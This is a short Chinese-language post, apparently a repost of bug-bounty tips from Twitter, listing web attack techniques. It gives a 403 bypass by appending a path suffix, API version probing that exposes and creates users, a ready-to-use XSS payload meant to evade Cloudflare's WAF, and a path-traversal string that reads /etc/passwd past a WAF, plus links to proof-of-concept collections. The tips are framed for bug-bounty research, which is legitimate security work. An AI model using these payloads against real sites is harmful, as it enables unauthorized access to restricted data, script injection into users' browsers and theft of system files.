Twitter滲透技巧搬運工
VSole2022-08-21 11:21:33
403 BypassBug type: 403 Bypass
site[.]com/env => 403 Forbidden site[.]com/env/HTTPS2 => Bypassed


Bug Bounty Dorks

API hackingAPI hacking Status: [Dup] Internally known
Tip: Check endpoint's on different api versions
1. GET /v2/users or /v2/users.json -> 4032. GET /v3/users -> 4033. GET /v3/users.json -> 2004. GET /v4/users -> 2005. POST /v4/users -> 200 [Users created]
- bugbounty poc集合
https://github.com/zeroc00I/AllVideoPocsFromHackerOne/tree/main/weakness
命令注入備忘錄

- Cloudfalre XSS Bypass
"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//
來源:https://github.com/HernanRodriguez1
補充閱讀:XSS 繞過 CLOUDFLARE + 過濾器
https://0xjin.medium.com/new-xss-bypass-cloudflare-filters-2a878c01d312
- 本地文件包含 WAF (Cloudflare) bypass
../../etc/passwd = 403 Forbidden../../etc/random/../passwd = 200 OK
VSole
網絡安全專家